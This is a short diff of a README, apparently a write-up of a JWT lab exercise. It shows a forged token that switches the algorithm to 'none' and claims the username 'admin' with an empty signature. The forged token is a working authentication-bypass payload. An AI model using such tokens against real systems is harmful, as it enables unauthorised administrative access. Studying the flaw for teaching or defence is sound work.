JulienFink/JWT-Project/README.md

 {"typ":"JWT","alg":"HS256"}.{"username":"guest"}.'a signature crafted using a secret unknown to us'
 ```

-We can craft our own JWT :
+We can craft our own JWT using the 'none' algorithm :
 ```
 eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VybmFtZSI6ImFkbWluIn0.
 {"typ":"JWT","alg":"none"}.{"username":"admin"}.